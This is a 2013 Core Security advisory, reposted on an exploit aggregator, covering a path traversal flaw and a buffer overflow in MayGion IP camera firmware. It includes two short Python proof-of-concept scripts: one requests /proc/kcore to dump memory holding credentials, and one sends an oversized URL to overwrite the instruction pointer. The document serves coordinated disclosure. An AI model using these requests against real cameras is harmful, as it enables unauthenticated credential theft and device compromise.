MayGion IP Camera Path Traversal / Buffer Overflow

🗓️ 29 May 2013 00:00:00Reported by Core SecurityType

zdt🔗 0day.today👁 45 Views

MayGion IP Cameras multiple vulnerabilities, Path Traversal, Buffer Overflow, Code execution, Security bypass, CVE-2013-1604, CVE-2013-1605, MayGion IP cameras firmware v09.27 and below affected, User Credentials Leaked, Buffer overflow exploit, Vendor notification and publication date

Reporter	Title	Published	Views	Family All 19
Circl	CVE-2013-1604	29 May 201300:00	–	circl
Circl	CVE-2013-1605	29 May 201300:00	–	circl
Core Security	MayGion IP Cameras multiple vulnerabilities	28 May 201300:00	–	coresecurity
CVE	CVE-2013-1604	25 Mar 201414:00	–	cve
CVE	CVE-2013-1605	25 Mar 201414:00	–	cve
Cvelist	CVE-2013-1604	25 Mar 201414:00	–	cvelist
Cvelist	CVE-2013-1605	25 Mar 201414:00	–	cvelist
Exploit DB	MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities	29 May 201300:00	–	exploitdb
exploitpack	MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities	29 May 201300:00	–	exploitpack
NVD	CVE-2013-1604	25 Mar 201418:21	–	nvd

MayGion IP Cameras multiple vulnerabilities

1. *Advisory Information*

Title: MayGion IP Cameras multiple vulnerabilities
Advisory ID: CORE-2013-0322
Advisory URL:
http://www.coresecurity.com/advisories/maygion-IP-cameras-multiple-vulnerabilities
Date published: 2013-05-28
Date of last update: 2013-05-28
Vendors contacted: MayGion
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Path traversal [CWE-22], Buffer overflow [CWE-119]
Impact: Code execution, Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1604, CVE-2013-1605

3. *Vulnerability Description*

Multiple vulnerabilities have been found in MayGion IP cameras [1] based
on firmware v09.27 and below, that could allow an unauthenticated remote
attacker:

   1. [CVE-2013-1604] to dump the camera's memory and retrieve user
credentials,
   2. [CVE-2013-1605] to execute arbitrary code.

4. *Vulnerable Packages*

   . MayGion IP cameras based on firmware 2011.27.09.
   . Other firmware versions are probably affected too but they were not
checked.

5. *Non-Vulnerable Packages*

   . H.264 ipcam firmware 2013.04.22.

6. *Credits*

These vulnerabilities were discovered and researched by Nahuel Riva and
Francisco Falcon from Core Exploit Writers Team.

7. *Technical Description / Proof of Concept Code*

7.1. *User Credentials Leaked via Path Traversal*

[CVE-2013-1604] The following Python code exploits a path traversal and
dumps the camera's memory. Valid user credentials can be extracted from
this memory dump by an unauthenticated remote attacker.

/-----
import httplib

conn = httplib.HTTPConnection("192.168.100.1")
conn.request("GET", "/../../../../../../../../../proc/kcore")
resp = conn.getresponse()
data = resp.read()
conn.close()
-----/

7.2. *Buffer overflow*

[CVE-2013-1605] The following Python script can be used to trigger the
vulnerability without authentication. As a result, the Instruction
Pointer register (IP) will be overwritten with 0x61616161, which is a
typical buffer overrun condition.

/-----
import httplib

conn = httplib.HTTPConnection("192.168.100.1")
conn.request("GET", "/" + "A" * 3000 + ".html")
resp = conn.getresponse()
data = resp.read()
conn.close()
-----/

8. *Report Timeline*

. 2013-05-02:
Core Security Technologies notifies MayGion of the vulnerabilities.
Publication date is set for May 29th, 2013.

. 2013-05-02:
Vendor asks for a report with technical information.

. 2013-05-03:
A draft advisory containing technical details sent to MayGion team.

. 2013-05-03:
Vendor notifies that all vulnerabilities were fixed in the last firmware
version, released April 22nd, 2013.

. 2013-05-09:
Core asks for a list of affected devices and firmware. No reply received.

. 2013-05-28:
Advisory CORE-2013-0322 is published.

#  0day.today [2018-04-10]  #

29 May 2013 00:00Current

7High risk

Vulners AI Score7

EPSS0.23385